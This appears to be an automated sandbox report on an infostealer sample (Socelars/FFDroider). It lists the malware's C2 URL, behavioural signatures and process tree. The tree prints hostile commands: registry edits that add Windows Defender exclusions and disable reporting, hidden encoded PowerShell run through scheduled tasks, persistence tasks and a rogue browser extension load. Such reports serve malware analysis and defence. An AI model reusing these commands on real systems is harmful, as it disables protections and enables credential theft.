Analysis

  • max time kernel
    83s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    22-05-2022 05:44

General

  • Target

    Service.exe

  • Size

    385KB

  • MD5

    45abb1bedf83daf1f2ebbac86e2fa151

  • SHA1

    7d9ccba675478ab65707a28fd277a189450fc477

  • SHA256

    611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f

  • SHA512

    6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c

Malware Config

Extracted

Family

socelars

C2

https://sa-us-bucket.s3.us-east-2.amazonaws.com/hfber54/

Signatures

  • FFDroider

    Stealer targeting social media platform users first seen in April 2022.

  • FFDroider Payload 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Downloads MZ/PE file
  • Executes dropped EXE 16 IoCs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • NSIS installer 4 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Service.exe
    "C:\Users\Admin\AppData\Local\Temp\Service.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:3148
    • C:\Users\Admin\Documents\tpmKC62tTao9dfM8HNA_mwKF.exe
      "C:\Users\Admin\Documents\tpmKC62tTao9dfM8HNA_mwKF.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1892
      • C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
        "C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:1568
      • C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
        "C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"
        3⤵
        • Executes dropped EXE
        PID:4120
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 444
          4⤵
          • Program crash
          PID:2332
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 764
          4⤵
          • Program crash
          PID:2476
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 772
          4⤵
          • Program crash
          PID:2580
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 816
          4⤵
          • Program crash
          PID:4984
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 824
          4⤵
          • Program crash
          PID:4536
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 984
          4⤵
          • Program crash
          PID:5112
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 1012
          4⤵
          • Program crash
          PID:1956
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 1348
          4⤵
          • Program crash
          PID:4572
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe" & exit
          4⤵
            PID:4044
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im "mixinte.bmp.exe" /f
              5⤵
              • Kills process with taskkill
              PID:3980
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 1392
            4⤵
            • Program crash
            PID:3544
        • C:\Users\Admin\Pictures\Adobe Films\utube2005.bmp.exe
          "C:\Users\Admin\Pictures\Adobe Films\utube2005.bmp.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4480
          • C:\Users\Admin\AppData\Local\Temp\7zSCDFE.tmp\Install.exe
            .\Install.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:560
            • C:\Users\Admin\AppData\Local\Temp\7zSD745.tmp\Install.exe
              .\Install.exe /S /site_id "525403"
              5⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks computer location settings
              • Enumerates system info in registry
              • Suspicious use of WriteProcessMemory
              PID:2496
              • C:\Windows\SysWOW64\forfiles.exe
                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                6⤵
                  PID:4812
                  • C:\Windows\SysWOW64\cmd.exe
                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    7⤵
                      PID:1976
                      • \??\c:\windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                        8⤵
                          PID:2288
                        • \??\c:\windows\SysWOW64\reg.exe
                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                          8⤵
                            PID:1276
                      • C:\Windows\SysWOW64\forfiles.exe
                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                        6⤵
                          PID:1020
                          • C:\Windows\SysWOW64\cmd.exe
                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                            7⤵
                              PID:3732
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                8⤵
                                  PID:3164
                                • \??\c:\windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                  8⤵
                                    PID:5076
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "goyJtrHTC" /SC once /ST 04:25:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                6⤵
                                • Creates scheduled task(s)
                                PID:4216
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /run /I /tn "goyJtrHTC"
                                6⤵
                                  PID:4132
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "goyJtrHTC"
                                  6⤵
                                    PID:740
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "bqKmJhnTVzvUlyJoNz" /SC once /ST 05:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AxCXTNZlIUQioadHG\jcquqnpMowPguoR\VMNfhjS.exe\" B6 /site_id 525403 /S" /V1 /F
                                    6⤵
                                    • Creates scheduled task(s)
                                    PID:3728
                            • C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe
                              "C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of WriteProcessMemory
                              PID:4496
                              • C:\Windows\SysWOW64\ftp.exe
                                ftp -?
                                4⤵
                                  PID:4780
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c cmd < Esistenza.wbk
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:5056
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd
                                    5⤵
                                      PID:1392
                                      • C:\Windows\SysWOW64\tasklist.exe
                                        tasklist /FI "imagename eq BullGuardCore.exe"
                                        6⤵
                                        • Enumerates processes with tasklist
                                        PID:3156
                                      • C:\Windows\SysWOW64\find.exe
                                        find /I /N "bullguardcore.exe"
                                        6⤵
                                          PID:1456
                                        • C:\Windows\SysWOW64\tasklist.exe
                                          tasklist /FI "imagename eq PSUAService.exe"
                                          6⤵
                                          • Enumerates processes with tasklist
                                          PID:4792
                                        • C:\Windows\SysWOW64\find.exe
                                          find /I /N "psuaservice.exe"
                                          6⤵
                                            PID:772
                                          • C:\Windows\SysWOW64\findstr.exe
                                            findstr /V /R "^VBNKEZcFuClIqCwDfZLYyYSgBIFmwizNsZNbuKFwcrNiUBFraGQiScYWImpWzVEYpvswOEbFzKCelLzZeCux$" Dattero.wbk
                                            6⤵
                                              PID:4120
                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Congiunto.exe.pif
                                              Congiunto.exe.pif P
                                              6⤵
                                                PID:4488
                                        • C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Writes to the Master Boot Record (MBR)
                                          PID:1232
                                        • C:\Users\Admin\Pictures\Adobe Films\search_hyperfs_310.exe.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\search_hyperfs_310.exe.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          • Modifies registry class
                                          • Suspicious use of WriteProcessMemory
                                          PID:1628
                                          • C:\Windows\SysWOW64\control.exe
                                            "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\DASGEFLW.cpL",
                                            4⤵
                                              PID:1984
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DASGEFLW.cpL",
                                                5⤵
                                                • Loads dropped DLL
                                                PID:3968
                                                • C:\Windows\system32\RunDll32.exe
                                                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DASGEFLW.cpL",
                                                  6⤵
                                                    PID:3188
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\DASGEFLW.cpL",
                                                      7⤵
                                                        PID:3136
                                              • C:\Users\Admin\Pictures\Adobe Films\random.exe.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\random.exe.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                • Suspicious use of SetWindowsHookEx
                                                • Suspicious use of WriteProcessMemory
                                                PID:3536
                                                • C:\Users\Admin\Pictures\Adobe Films\random.exe.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\random.exe.exe" -h
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:2732
                                              • C:\Users\Admin\Pictures\Adobe Films\download2.exe.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\download2.exe.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                • Suspicious use of WriteProcessMemory
                                                PID:1772
                                                • C:\Users\Admin\AppData\Local\Temp\InvisBrowser45856.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\InvisBrowser45856.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:2652
                                                • C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2460
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                    5⤵
                                                      PID:1604
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /f /im chrome.exe
                                                        6⤵
                                                        • Kills process with taskkill
                                                        PID:2772
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                      5⤵
                                                        PID:3000
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe0a734f50,0x7ffe0a734f60,0x7ffe0a734f70
                                                          6⤵
                                                            PID:4680
                                                      • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4452
                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                          5⤵
                                                            PID:1172
                                                        • C:\Users\Admin\AppData\Local\Temp\setup331.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\setup331.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:1320
                                                          • C:\Windows\SysWOW64\control.exe
                                                            "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\zBxdF.CpL",
                                                            5⤵
                                                              PID:4140
                                                          • C:\Users\Admin\AppData\Local\Temp\xiufangwang.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\xiufangwang.exe"
                                                            4⤵
                                                              PID:4512
                                                              • C:\Users\Admin\AppData\Local\Temp\xiufangwang.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\xiufangwang.exe" -h
                                                                5⤵
                                                                  PID:892
                                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                4⤵
                                                                  PID:3148
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-A5U9B.tmp\setup.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-A5U9B.tmp\setup.tmp" /SL5="$30246,921114,831488,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                    5⤵
                                                                      PID:1460
                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe" /VERYSILENT
                                                                        6⤵
                                                                          PID:4512
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-DRG29.tmp\setup.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-DRG29.tmp\setup.tmp" /SL5="$20258,921114,831488,C:\Users\Admin\AppData\Local\Temp\setup.exe" /VERYSILENT
                                                                            7⤵
                                                                              PID:4468
                                                                      • C:\Users\Admin\AppData\Local\Temp\rtst1077.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\rtst1077.exe"
                                                                        4⤵
                                                                          PID:948
                                                                          • C:\Windows\system32\WerFault.exe
                                                                            C:\Windows\system32\WerFault.exe -u -p 948 -s 860
                                                                            5⤵
                                                                            • Program crash
                                                                            PID:4696
                                                                        • C:\Users\Admin\AppData\Local\Temp\note8876.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\note8876.exe"
                                                                          4⤵
                                                                            PID:4392
                                                                          • C:\Users\Admin\AppData\Local\Temp\pregmatch-1.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\pregmatch-1.exe"
                                                                            4⤵
                                                                              PID:2520
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Roaming\lberuldwiiun"
                                                                                5⤵
                                                                                  PID:5080
                                                                              • C:\Users\Admin\AppData\Local\Temp\inst002.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\inst002.exe"
                                                                                4⤵
                                                                                  PID:2772
                                                                                • C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
                                                                                  4⤵
                                                                                    PID:5044
                                                                                    • C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
                                                                                      5⤵
                                                                                        PID:1564
                                                                                        • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--uOyLnaD1"
                                                                                          6⤵
                                                                                            PID:4192
                                                                                            • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ffe1048dec0,0x7ffe1048ded0,0x7ffe1048dee0
                                                                                              7⤵
                                                                                                PID:3132
                                                                                              • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1608,15786398743439233216,4944824041328115859,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4192_1202303577" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:2
                                                                                                7⤵
                                                                                                  PID:2404
                                                                                                • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1608,15786398743439233216,4944824041328115859,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4192_1202303577" --mojo-platform-channel-handle=2172 /prefetch:8
                                                                                                  7⤵
                                                                                                    PID:2204
                                                                                                  • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,15786398743439233216,4944824041328115859,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4192_1202303577" --mojo-platform-channel-handle=2152 /prefetch:8
                                                                                                    7⤵
                                                                                                      PID:1628
                                                                                              • C:\Users\Admin\AppData\Local\Temp\logger2.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\logger2.exe"
                                                                                                4⤵
                                                                                                  PID:3532
                                                                                                • C:\Users\Admin\AppData\Local\Temp\anytime 7.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\anytime 7.exe"
                                                                                                  4⤵
                                                                                                    PID:1536
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\anytime 6.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\anytime 6.exe"
                                                                                                    4⤵
                                                                                                      PID:4972
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                  2⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:1888
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                  2⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:1744
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4120 -ip 4120
                                                                                                1⤵
                                                                                                  PID:4736
                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                  1⤵
                                                                                                  • Process spawned unexpected child process
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3592
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                    2⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:452
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 452 -s 600
                                                                                                      3⤵
                                                                                                      • Program crash
                                                                                                      PID:2472
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 452 -ip 452
                                                                                                  1⤵
                                                                                                    PID:1844
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4120 -ip 4120
                                                                                                    1⤵
                                                                                                      PID:1792
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4120 -ip 4120
                                                                                                      1⤵
                                                                                                        PID:3384
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 468 -p 948 -ip 948
                                                                                                        1⤵
                                                                                                          PID:3812
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                          1⤵
                                                                                                            PID:968
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 968 -s 600
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:2924
                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                            1⤵
                                                                                                            • Process spawned unexpected child process
                                                                                                            PID:3280
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\zBxdF.CpL",
                                                                                                            1⤵
                                                                                                              PID:1164
                                                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\zBxdF.CpL",
                                                                                                                2⤵
                                                                                                                  PID:1828
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\zBxdF.CpL",
                                                                                                                    3⤵
                                                                                                                      PID:876
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                  1⤵
                                                                                                                    PID:380
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4120 -ip 4120
                                                                                                                    1⤵
                                                                                                                      PID:1592
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 968 -ip 968
                                                                                                                      1⤵
                                                                                                                        PID:4892
                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 544 -p 4972 -ip 4972
                                                                                                                        1⤵
                                                                                                                          PID:1128
                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 524 -p 1536 -ip 1536
                                                                                                                          1⤵
                                                                                                                            PID:3664
                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 4972 -s 1688
                                                                                                                            1⤵
                                                                                                                            • Program crash
                                                                                                                            PID:3568
                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 496 -p 3532 -ip 3532
                                                                                                                            1⤵
                                                                                                                              PID:3556
                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 1536 -s 1692
                                                                                                                              1⤵
                                                                                                                              • Program crash
                                                                                                                              PID:2184
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4120 -ip 4120
                                                                                                                              1⤵
                                                                                                                                PID:4444
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
